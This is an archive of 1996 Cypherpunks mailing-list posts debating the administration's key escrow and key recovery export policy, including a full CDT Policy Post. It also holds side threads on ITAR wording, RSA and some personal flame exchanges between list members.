> I just got word from one of my buddies that someone has been forging
> my e-mail to cypherpunks talking about the pederast organization
> NAMBLA.

There's a character on cypherpunks named Timmy May with a long history
of attributing to people various nonsense they didn't say.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 4 Oct 1996 11:16:44 +0800
To: cypherpunks@toad.com
Subject: Did Sun get a sweetheart deal?
Message-ID: <199610040001.RAA15595@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


So why did Sun cave in?

Ern

-------- From San Jose Mercury: "Good Morning Silicon Valley"

NASA has its day in the Sun

  Sun Microsystems Inc. said Wednesday it received two contracts from
  NASA's Goddard Space Flight Center worth a total of $100 million. The
  Mountain View-based company said the pact calls for software
  development and the design about 34,000 computer-aided engineering
  and design workstations. NASA will use the workstations to design
  integrated circuits.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 4 Oct 1996 11:09:43 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
Message-ID: <3.0b16.32.19961003170416.00bafcd8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:50 PM 10/3/96 -0400, Anonymous wrote:
>
>Ernest Hua <hua@chromatic.com> wrote:
>> I predict, therefore, Netscape and RSA would NOT capitulate to this
>> latest bitter carrot.
>
>Huh?  RSA has already gone over to the dark side.  According to
>http://www.rsa.com/PRESSBOX/releases/keyrecov.htm:
>   "The recently announced Key Recovery Alliance, of which RSA is a part,
..."

I think we should refer to what they are pushing as the "Key Recovery
Alliance Program".  K.R.A.P. is a good description as to what we are going
to get from them.



---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 4 Oct 1996 16:13:15 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <199610031711.KAA25355@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961003165524.1737A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, jim bell wrote:

> At 07:17 AM 10/3/96 -0400, Black Unicorn wrote:
> >On Thu, 3 Oct 1996, Remo Pini wrote:
> 
> >> Date: Thu Oct 03 08:08:42 1996
> >> > >*   A launch vehicle or payload shall not, by reason of the launching
> >> > >*   of such vehicle, be considered an export for purposes of this
> >> > >*   subchapter.
> >> > Okay, everybody, call Estes!  We've got some crypto to export...er...laun
> >> > ch!
> >> If I get the above wording correctly (unicorn, help me!), it is sufficient 
> >> to put the cryptostuff on a disc in a LAUNCHABLE device, it never says that 
> >> the payload has to be delivered by air. So, just put that thing in a bag 
> >> and get it through customs... (or does "by reason of ..." mean that the 
> >> exclusive means of export allowed is launching ?)
> >
> >The launching alone will not cause it to be an export.  If it is launched
> >and then ends up outside the U.S., it could be an export.  Certainly if it
> >is launched with the purpose of exporting crypto, it will be an export.
> 
> Too bad you didn't support this with a logical argument.

I invite you to study law and with it the doctrine of "plain meaning."

> The wording was 
> clearly intended to be an exception to a rule.  What the wording doesn't 
> include is the "exception to the exception," most likely because they 
> weren't thinking in too great a detail when they wrote the regulations.

They were thinking in enough detail here.  

Thankfully, along with the title political scientist, Mr. Bell also
never had a calling as an attorney.

"A launch vehicle or payload shall not, by reason of the launching of such
vehicle, be considered an export for purposes of this subchapter."

Focus on "by reason of launching of such vehicle,"

Launching a vehicle alone is not export.  It takes more than launch to
make it an export.  More than the launching is not much.

If they wanted to be as inclusive as you would suggest, they would have
left out "by reason of launching of such vehicle." leaving "A launch
vehicle or payload shall not be considered an export for purposes of this
subchapter."

I do get tired of Mr. Bell's half baked attempts to derail any point I
might make.  I wouldn't find them annoying if they were based in anything
like fact rather than some innane and childish attempt to recover the
credibility he so sorely lost in trying to argue with me months ago.
My only regret is that I was so tolerant and patent that I bothered to
respond to most of his lunacy.

> But 
> if the regulation is "wrong," the fault of that is those who wrote the 
> regulation.  (and we, the public, are entitled to assume that the regulation 
> is "right" in its literal meaning.)

It is "right" in its literal meaning.  You, being anything but a
representative of the public, are wrong in intrepreting it.
 
> It appears that the government left a loophole so large that  you could 
> drive a truck...er...shoot a rocket through it.

One might say the same about the size of the hole in your logic and good
sense.  One would have the advantage of being more accurate in this
instance as well.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 4 Oct 1996 06:37:18 +0800
To: "Dr.Dimitri Vulis KOTM" <cypherpunks@toad.com
Subject: "Mormon Asshole?"  re: GAK
In-Reply-To: <Pua8uD17w165w@bwalk.dm.com>
Message-ID: <199610031843.MAA10736@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain



on 03 Oct 1995, Dr. Dimitri Vulis KOTM <dlv@bwalk.dm.com> defecated:

-.(We have at least one mormon asshole here, attilla, who's obviously pro-GAK)
-.
    ------
  
        pro-GAK?   either me or the average Utahn?   really?    

        no way.  

        other than Salt Lake City area which might be more pro-GAK,
    which were it not for Temple Square, etc. could be just any other
    large city with a Mormon MINORITY.  the population influx asking 
    to be able to join our safe communities and values has not only 
    changed the balance of power in favour of outsiders, but the 
    outsiders brought their social problems (gangs, drugs, morals, etc.)
    with them.   and maybe willing to trade their freedoms for 
    temporary security.  surprised?

        ask questions before you quote me (or anyone) as to their 
    position on constitutional matters.  your innuendos and depravity
    is unworthy of any educated Western individual, or do you not
    consider yourself a Western intellectual?  maybe you really are 
    only capable of playing the Vodka sotted Russian fool?  where is
    your dancing bear?

        I think I have more than a few credentials for being anti
    anything the Feds propose on curbing the Bill of Rights and the
    Constitution  --including more than several visits from the boys 
    in grey trench coats in the early morning, and being arrested and
    charged by the Feds with both crypto and 'trading with the enemy' 
    --the fear of public disclosure is what stops them from going even
    to indictment.  and, I endured one of their standard forms of pay-
    back, at a personal price we shall not discuss.

        a man is considered lucky if he has one true friend when he is
    down and being kicked by the Feds;  I found a virtual army of good
    people, many outside my immediate ward, who not only did not turn
    their backs, but actively supported; many not even knowing what 
    the fight was about, let alone understanding it other than not
    only my rights, but theirs as well, were be trampled upon by the 
    Feds.  

        do you have any friends like that? 

        --to you, that is a loaded question which  probably should 
    been framed as '...do you have any friends?'  

            but I shall give you the benefit of the doubt.

        dimitri (in the diminutive), go sniff a few flowers to counter
    your rank stench of incivility.  go wander the boardwalk as an
    obscure soul.  lighten up; the glass of water we ALL drink from
    is still at least half-full, not half-empty.  sometimes life does
    give free refills.

--
  "The only natural criminal class in America, the U.S. Congress"
        --Mark Twain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 4 Oct 1996 12:04:30 +0800
To: cypherpunks@toad.com
Subject: gack vs. key escrow vs. key recovery
Message-ID: <199610040033.RAA18660@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


cpunks, a note about recent developments in "key recovery" initiative.

I think cpunks as a group should reconsider very seriously their
own positions on cryptography and come up with something more
sophisticated than "any government bill or plan associated with
crypto is evil" which is the functional equivalent of the ideology
behind many recent posts.

what is the precise difference between gack, key escrow, and
key recovery? TCM has argued that the administration is muddying
the issue by manipulating the terminology. perhaps so, but I feel
that cpunks are equally guilty, by branding anything that emanates
out of the government as inherently orwellian. do you always have
to have an enemy? is the government always going to be your 
enemy, no matter what they do?

I have posted here before that many companies find the concept
of "key recovery" highly acceptable and even desirable. the 
basic question is, what does this mean to wiretapping and 
search warrants and subpoenas?

it is clear we are coming to a fork in the road at this moment.
there are going to be two types of cpunk opinions based on recent
developments.

1. those who feel that wiretapping was illegitimate from the
start and are working to make wiretapping impossible. confronted
with a legal search warrant/subpoena etc. for personal data, 
they would not hand over keys. they would "superencrypt" in
systems that do etc.

2. those who feel that there is such a thing as a legal warrant
or subpoena for information protected by cryptography keys, and
would agree that this logically means that governments will be
getting access to "key recovery" infrastructures.

personally I am leaning toward 2, because I feel that we already
live in such a society, and that it is not orwellian. companies are
going to lean toward (2). I do agree
that the gov't has the potential to twist this process to evil
ends, but that has always been true of everything about democratic
government, and the recipe for 200+ years has always been
and remains "eternal vigilance". in other words, I am in favor
of some kind of mechanism by which the government can obtain
keys via subpoenas/warrants.
 
cpunks, I think we should try to clarify our terms and come to
some conclusions. 

those who continue to pursue (1) are going to be perceived as
more and more radical and extremist, because arguably it is not
even a system we have today or one that was ever devised.
remember, the constution guarantees
freedom from *unreasonable* search and seizure, but never
prohibited search and seizure in the first place!! apparently
at least our found fathers believed that "reasonable" search
and seizure was a wholly legitimate function of government,
based on this wording.

regarding (2): the government may actually help bring crypto
to the masses via the post office and other routes. are
cpunks going to continue to hold the simplistic, reactionary,
knee-jerk, black-and-white opinion that "anything with the
word 'government' in it is evil"? "if the government is doing
something, then we must sabotage it"?

I'll be watching the debate closely, as the true extremists
incapable of compromise (and thereby living in a fantasy world)
show their colors....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Fri, 4 Oct 1996 10:53:48 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
Message-ID: <199610032148.RAA21930@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain



Ernest Hua <hua@chromatic.com> wrote:
> I predict, therefore, Netscape and RSA would NOT capitulate to this
> latest bitter carrot.

Huh?  RSA has already gone over to the dark side.  According to
http://www.rsa.com/PRESSBOX/releases/keyrecov.htm:
   "The recently announced Key Recovery Alliance, of which RSA is a part, ..."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Palacios <editor@cdt.org>
Date: Fri, 4 Oct 1996 16:24:22 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.35 - Latest Admin Crypto Policy Pushes KeyEscrow
Message-ID: <v03007813ae79e86b07b6@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 35
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 35                       October 3, 1996

 CONTENTS: (1) Latest Administration Crypto Policy Continues Push Towards
               Key Escrow
           (2) Analysis of the Administration's Next Step: Short-Term
               Export Relief to Compel Long-Term Key Escrow
           (3) How to Subscribe/Unsubscribe to the Policy Post list
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) LATEST ADMINISTRATION CRYPTO POLICY CONTINUES PUSH TOWARDS KEY ESCROW

This week the Administration announced the latest in a series of encryption
policies designed to promote the use of key escrow systems, both
domestically and abroad.  This latest initiative continues the drive
towards a global guarantee of law enforcement access to all encrypted
communications and stored data. CDT believes that such governmental access
systems -- whether through "key escrow" or "key recovery" -- threaten the
fundamental privacy rights of computer users, both domestically and abroad.

The latest Administration proposal would promote key escrow by temporarily
easing current export restrictions on moderately strong encryption
products.  The proposal would raise the current export limit from 40 bits
to 56 bits for companies that agree to produce key escrow products.
Companies would be required to report their progress every six months.
After two years, all exportable encryption systems stronger than 40-bits
would have to include key escrow.  Encryption producers will be compelled to
be part of this scheme in order to stay competitive, eventually producing and
adopting key escrow systems which so far have been largely rejected by the
public.

An overview of the latest Administration policy, considered within the
context of the government's relentless drive towards key escrow, is
attached below.

- THE UNSWERVING GOAL: GOVERNMENT ACCESS TO ALL COMMUNICATIONS AND
  STORED DATA

The long-standing goal of every major encryption plan by the Administration
has been to guarantee government access to all encrypted communications and
stored data. In 1993, the Clipper Chip policy achieved access through keys
held by the government.  In 1995, the "Clipper II" proposal allowed export
relief for commercial key escrow systems. This summer, "Clipper III" sought
access to keys through the dual incentives of export controls and a new
government "key management infrastructure."  In each case, the ultimate
goal has been a guarantee of government access to the plaintext of
encrypted information.  Law enforcement and national security interests
have driven this process.

The attempt to institutionalize key escrow worldwide is a fundamental
threat to the privacy and security of Internet users both domestically and
abroad.

* GUARANTEED ACCESS TO INTERNET COMMUNICATIONS AND STORED DATA WOULD BE
  A DRAMATIC EXPANSION OF CURRENT LAW ENFORCEMENT CAPABILITIES.

  Guaranteed access to Internet communications and stored files is a far
  greater intrusion into the privacy of computer users than current
  wiretapping.   As individuals conduct more aspects of their lives
  online, key escrow is tantamount to guaranteeing law enforcement
  access to all of our most intimate conversations, sensitive personal
  records, musings and thoughts in a way never available before.  Within
  the United States, Congress and the courts have established a delicate
  balance in electronic surveillance between law enforcement and
  individual privacy rights.  Key escrow destroys that balance,
  providing law enforcement with a comprehensive dossier of individual
  lives and activities.

* GLOBAL KEY ESCROW ENDANGERS THE PRIVACY RIGHTS OF COMPUTER USERS
  COMMUNICATING IN COUNTRIES THAT HAVE NO FOURTH AMENDMENT OR OTHER
  PRIVACY PROTECTIONS.

  An international key escrow scheme will necessarily entail the escrow
  of key information in foreign countries, with access by foreign
  governments through much weaker privacy protections.  Such global key
  escrow jeopardizes the privacy rights of any American who communicates
  or stores files abroad, where key information might be released with
  few privacy protections. Moreover, global key escrow endangers the
  privacy and free expression of computer users everywhere by
  establishing the global machinery for government surveillance without
  privacy protections.

* THE CHOICE TO ACCEPT THE COSTS AND RISKS OF KEY ESCROW SHOULD BE MADE
  BY INDIVIDUAL USERS, NOT FORCED UPON THEM.

  Additional access points to encrypted data will create added
  vulnerabilities, new security problems, and additional costs.  While
  some users may decide that the benefits of key escrow outweigh the
  costs, governments should not be imposing these costs and risks on
  users who do not want them.  Individuals should be able to choose the
  type of encryption they want.

The global adoption of government access systems has serious, negative
consequences on the privacy of computer users. The recent Administration
announcement is another step in that wrong direction.

-----------------------------------------------------------------------
WHAT YOU CAN DO -- ADOPT YOUR LEGISLATOR

As Members of Congress head home for the fall elections, they need to hear
from Internet users about the importance of encryption policy reform for
the future of the Net.

Adopt your legislator -- tell them that the Administration's Key Escrow
plan threatens the basic privacy rights of Internet users, and let us know
what they say!

Please take a moment to join the "Adopt Your Legislator" campaign. By
taking a moment to sign up to contact your member of Congress, you can make
a critical difference in the debate over privacy and security on the
Internet.

Details can be found at:  http://www.crypto.com/
                    and   http://www.cdt.org/crypto/

Tell them it's "My Lock, My Key!"

(The Adopt Your Legislator Campaign is a joint effort organized by the
Voters Telecommunications Watch (VTW), the Electronic Frontier Foundation
(EFF) and the Center for Democracy and Technology (CDT)).
-----------------------------------------------------------------------

(2) ANALYSIS OF THE ADMINISTRATION'S NEXT STEP: SHORT-TERM EXPORT RELIEF
    TO COMPEL LONG-TERM KEY ESCROW

The latest Administration encryption policy, announced October 1, continues
this trend towards governmental access to all encrypted information.  Using
a carrot-and-stick approach, the plan promises moderate, short-term export
relief in return for the development and eventual adoption of key recovery
systems.

The Administration unveiled its encryption initiative at a White House
briefing by CIA Director John Deutch, Domestic Policy Advisor to the Vice
President Greg Simon, Undersecretary of Commerce William Reinsch, and
high-level representatives of the Department of Justice and the Office of
Management and Budget.  The basic outlines of the proposal included below
were culled from the Administration's statement and Tuesday's White House
briefing.

Major features of the new policy include:

* ALLOWS EXPORT OF 56-BIT ENCRYPTION PRODUCTS FOR THE NEXT TWO YEARS,
  "contingent upon industry commitments to build and market future
  products that support key recovery." Six-month licenses for 56-bit
  exports would be granted and renewed for up to two years -- contingent
  on satisfactory progress towards key escrow.

* REQUIRES KEY ESCROW CAPABILITIES AFTER TWO YEARS in all exportable
  products with more than 40 bits.

* "ENCOURAGES" THE ADOPTION OF KEY ESCROW SYSTEMS through international
  agreements, standards processes, and a new key management
  infrastructure.

* TRANSFERS JURISDICTION OVER ENCRYPTION EXPORT LICENSING TO THE
  DEPARTMENT OF COMMERCE, but grants the Department of Justice a formal
  vote in the process.

The President is expected to sign an Executive Order enacting many of these
changes in mid-October. Other pieces will be published as agency rules or
regulations; a small part of the proposal (rules governing key holders) may
require legislation.

WHAT IT ALL MEANS FOR INTERNET USERS:

In the short run, computer users may see more widespread availability of
moderately stronger encryption products (up to 56-bit key length) if
vendors choose to and are able to meet the "commitments" required under
the proposal.  In the longer term, however, even these moderately stronger
products will only be exportable with key escrow.  Ultimately, this
proposal is designed to force the widespread adoption of key escrow systems,
both domestically and abroad.


A.  EXPORT CONTROL RELIEF AS AN INCENTIVE FOR KEY ESCROW:  The
    Administration proposal would allow for short-term export of 56-bit
    DES equivalent encryption products in return for commitments from
    exporters to develop "key recovery" systems.

* Starting on Jan. 1, 1997, the Administration would begin granting six
  month general licenses for export of 56-bit encryption products.

* Licenses would be granted "contingent on commitments from exporters to
  explicit benchmarks and milestones for developing and incorporating
  key recovery features into their products and services."

* Additional six month licenses would be granted "if milestones are
  met."

* In two years, "the export of 56-bit products that do not support key
  recovery will no longer be permitted."

* Export of longer key lengths would continue for certain sensitive
  financial applications.

* Export of longer key lengths may be allowed more generally once key
  escrow mechanisms are in place.

Questions remain as to exactly what form the commitments from exporters
will take, who will qualify for these relaxations, and what will happen at
the end of two years to 56-bit non-escrow products in the marketplace and
how they will be supported.  No interoperability restrictions on products
have been mentioned, and the Administration seemed to indicate that it
would be willing to tolerate a greater degree of interoperability between
products.

WHAT EXPORT CONTROLS MEANS FOR INTERNET USERS:

This Administration export control scheme coerces industry into developing
key escrow systems, domestically and abroad, whether they want to or not.
Since 1992, export controls have been the favorite vehicle for enforcing
the adoption of such key escrow systems.  The strong public desire for
secure global communications has allowed government to use key escrow as a
precondition for export relief.   Export controls are a force for key
escrow in the domestic market as well as the international market because
of the need for secure international communications and the cost of
producing product lines for U.S. use only.  The Administration realizes
this: as CIA Director Deutch stated at the White House press briefing, he
was more concerned with encryption that people "buy at Sears" than about
less popular strong encryption products that the Administration concedes
will always be available.

In addition to their impact on the market for key escrow, the proposal's
export controls and key length limits themselves hurt user privacy and
security.

* Export controls don't make sense for a global Internet; they place
  business at a competitive disadvantage and prevent deployment of a
  secure global infrastructure.

* 56-bits is not enough for many applications.  CDT welcomes the
  Administration's recognition that 40-bit products are not strong
  enough, but last winter's study by a panel of encryption experts
  argued that DES keys can be cracked relatively quickly by well-
  financed groups, and that 70- to 90-bit keys are more appropriate.

* Key length limits are a flawed approach because they presuppose that
  some entities should be able to break keys and some should not -- a
  solution that is unlikely to appeal to worldwide consumers of
  encryption.


B.  "KEY RECOVERY":  Government access to the plaintext of encrypted
    data remains the centerpiece of the Administration proposal.  Major
    features of the key escrow requirements in the latest proposal
    include:

* Key escrow systems would rely on a trusted party to recover a user's
  confidentiality keys for use by law enforcement acting under "proper
  authority."

* The trusted recovery party might in some cases be internal to the
  user's organization, but in all cases notice to surveillance targets
  that their key information had been released would be prohibited.

* Access to keys internationally "would be provided in accordance with
  destination country policies and bilateral understandings."

* The Administration will pursue legislation to govern the release of
  keys, provide criminal and civil penalties for unauthorized releases
  or theft of keys, and provide liability protection for key holders.

* The Administration will continue to "encourage" the adoption of key
  escrow systems through it's broad efforts to promote international key
  escrow agreements, government key escrow purchasing standards, and the
  creation of a key management infrastructure.

None of the officials at the White House briefing were able to give
specific information about the requirements to be placed on key holders
(e.g., response times, security clearances, etc.)  The Administration did
indicate a broader approach to allowing industry key escrow systems that
more limited access to confidential information through, for example,
recovery of specific plaintext or separation of key information.

  NOTE: KEY ESCROW V. KEY RECOVERY -- CDT recognizes that real progress
  has been made in the development of systems that provide access to the
  plaintext of encrypted data while minimizing the collection and
  disclosure of sensitive key information.  However, from a privacy
  policy perspective these approaches have the same basic privacy
  problem: they are designed to provide law enforcement with guaranteed
  access to all encrypted information.

WHAT "KEY RECOVERY" MEANS FOR INTERNET USERS:

CDT recognizes that some companies and users may wish to use key escrow
systems.  The Administration's apparent recognition that these systems are
best designed in the private sector is welcome.  However, this policy's
acknowledged desire to widely promote key escrow is dangerous and threatens
the privacy of users:

* Users are being pushed towards key escrow, whether they want it or
  not. The Administration is using the enormous pressure of export
  controls, competitive markets, and industry standards to force
  adoption of key escrow.  Each user should be free to decide for
  themselves whether to accept the costs of key escrow.

* International key escrow doesn't protect privacy in a world without a
  Fourth Amendment -- What legal standards apply to communications when
  keys are held in foreign countries? Officials have been unable to
  clearly explain how the privacy of computer users will be preserved.

* Key escrow dramatically expands law enforcement capabilities --
  Guaranteed access to encrypted information is a far greater intrusion
  into our lives than the delicate balance struck under U.S. privacy
  law.

* Key escrow is unproven -- The NRC's recent study argued that a policy
  relying on key escrow is "not appropriate at this time" and "is likely
  to have a significant negative impact on the natural development of
  applications."

* Key escrow creates new security vulnerabilities, such as the creation
  of large aggregations of sensitive key information, that are poorly
  understood.


C.  TRANSFER OF JURISDICTION TO THE COMMERCE DEPARTMENT:  According to
    the White House, "after consultation with Congress, jurisdiction for
    commercial encryption controls will be transferred from the State
    Department to the Commerce Department."

* Encryption licenses will be reviewed under the Commerce Department's
  "normal process" by a committee with representatives from the
  Departments of Commerce, State, Defense, Energy, and for encryption
  exports, Justice.

* The Justice Department will have a single vote in the review
  committee, which will make its decisions by majority rule.

* The State Department will only have jurisdiction over special, single
  customer, military-specific encryption products.

WHAT TRANSFERRING JURISDICTION MEANS FOR INTERNET USERS:

While the switch to Commerce has been perceived as helpful by some, CDT
believes the benefits are unclear if fundamental policy remains unchanged.
The switch to Commerce will have little impact on the underlying policy
direction aimed at institutionalizing key escrow.  Moreover, the Commerce
Department's review committee is heavily weighted towards the law
enforcement and national security perspective (State, Defense, Justice, and
Energy), with the Commerce Department the lone representative of industry
and consumer interests. Finally, the presence of domestic law enforcement
in export control decisions raises serious questions about the ultimate
goal of this policy.

IV.  CONCLUSION

The Administration's latest encryption proposal remains wedded to a
flawed, key escrow and export control oriented approach that does not
address the privacy concerns of users.  While it contains some welcome
ideas, at its heart the Administration proposal uses the short-term easing
of export controls to promote key escrow through a Faustian bargain with an
industry desperate to produce strong security products.

Such manipulation of the market for encryption products is designed to
forward law enforcement's dangerous agenda of worldwide governmental access
to all encrypted information.  The march towards institutionalized key
escrow is a real threat to the privacy of computer users, particularly in a
world where not everyone has a Fourth Amendment.  The United States should
be a force for Internet privacy and security worldwide.  Rather than
forcing key escrow on a wary public, the Administration should look to work
with Congress, privacy and Internet advocates, the user community, and
industry to craft a truly voluntary policy that meets the privacy and
security needs of computer users in the global Information Age.

-----------------------------------------------------------------------

(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       http://www.cdt.org/
FTP                   ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.35                                            10/3/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 4 Oct 1996 12:39:54 +0800
To: hua@chromatic.com (Ernest Hua)
Subject: Re: Did Sun get a sweetheart deal?
In-Reply-To: <199610040001.RAA15595@ohio.chromatic.com>
Message-ID: <199610040109.SAA23900@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua writes:
> 
> So why did Sun cave in?

I'm not sure they did.  I've seen two quotes from Sun- one
pro-GAK one from Eric Schmidt, one from someone else I
have never heard of who's head of government relation or something
like that, which was pretty anti-GAK.  Schmidt is regarded as
somewhat clueless by a large number of Sun employees.

In addition, I had lunch today with the people I used to work
with/for at Sun, who're probably the most likely to be asked to implement
such a thing.  They haven't heard anything about it and were quite dismayed
at the whole idea.


Oh, and government contracts (especially NASA ones) take a shitload of
time to set up.  The only coercion that a TLA could do with it would
be to threaten to scotch the deal for "national security reasons".
The fact that some deal went through doesn't prove anything.
I think it much more likely that the Govt would use carrots
like possible additional sales or a leg up on competitors.
Hey, it worked on IBM didn't it?
 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Fri, 4 Oct 1996 11:21:25 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Mountain Meadows Massacre
Message-ID: <199610040022.SAA13554@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Oct 96 at 14:42, Dr.Dimitri Vulis KOTM wrote:

> "Deana Holmes" <mirele@xmission.com> writes:
> 
> <snip mor(m)on propaganda>
> > 
> > <snip Dmitri Vulis nonsense>
> 
> No wonder the criminal cult doesn't want its foul deeds subjected to
> public scrutiny by "dead-agenting" its critics. Is Timmy May a
> paid cult apologist?

Sheesh.

You know you're doing good when both Dmitri Vulis and Attila both
badmouth you.  (For the record, Attila's badmouthing consisted of
stating via private email that I was "the same air head
pseudo-intellectual who has poisoned her own life with hatred and
ignorance in so many other venues.") 

Some people are just terribly threatened, I guess.

Deana

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 4 Oct 1996 12:29:42 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Clipper III on the table
In-Reply-To: <3.0b16.32.19961003170416.00bafcd8@mail.teleport.com>
Message-ID: <Pine.3.89.9610031859.A16004-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 3 Oct 1996, Alan Olsen wrote:
> I think we should refer to what they are pushing as the "Key Recovery
> Alliance Program".  K.R.A.P. is a good description as to what we are going
> to get from them.

Ping. We have a winner!

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 4 Oct 1996 12:19:45 +0800
To: cypherpunks@toad.com
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007804ae79cbf6480a@[205.162.51.35]>
Message-ID: <Pine.LNX.3.95.961003182538.1145A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 3 Oct 1996, Jim McCoy wrote:

> Declan McCullagh <declan@eff.org> writes:
> >You'll have trouble doing a successful boycott of RSA. What, you won't
> >use Netscape Navigator or PGP?
> 
> Actually RSA is not a hard target for people like us to threaten.  The
> Diffie-Hellman patent expires in 210 days.  Cylink is prevented from taking
> legal action against anyone for violating this patent while the current
> lawsuit is being decided.  When Diffie-Hellman expires ElGamal is available
> for use for free.  So the best threat one can make against RSA is to directly
> challenge their revenue stream: start working on making ElGamal an available
> option in all systems which use RSA.

Rabin public-key encryption will also be free when the D-H patent expires.
This has the big advantage that it can use current RSA keys as long as the
keys use blum integers (PGP does, I think).  Breaking Rabin is provably as
difficult as factoring.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMlQ+NSzIPc7jvyFpAQFnOQf/TasoroPI6ZUfRuH/13jQedY+R49KYjoc
pdOnEmRfzuF3CFt5ZJatB97B+kz50VZMcT4nMGhK24q5fZcvJqTcVDbGMEPJgmeZ
1TZAFiGAXcKjnuB+i1PuGpPkM6SjLkXiuxW4ZASiWtmQ2hCnlCKm/EN+lvW5avjT
HjK3W6GiU4HvSmsL292S1jgMrPw/0vbEtQ9J65edamtDboDLfrbYd26OAh0QjUxe
vlTHrVcU5v5n4kVxjfvhdVabJOGmFAQ+cIKCVSTmhELPmbYkRp+TIgsRTse15NpK
ocEKfpsHZu093AMnealZ6+/neCBWtqKSL2Jz7yHTCDbXkMw0Ab/nLQ==
=SJUX
-----END PGP SIGNATURE-----





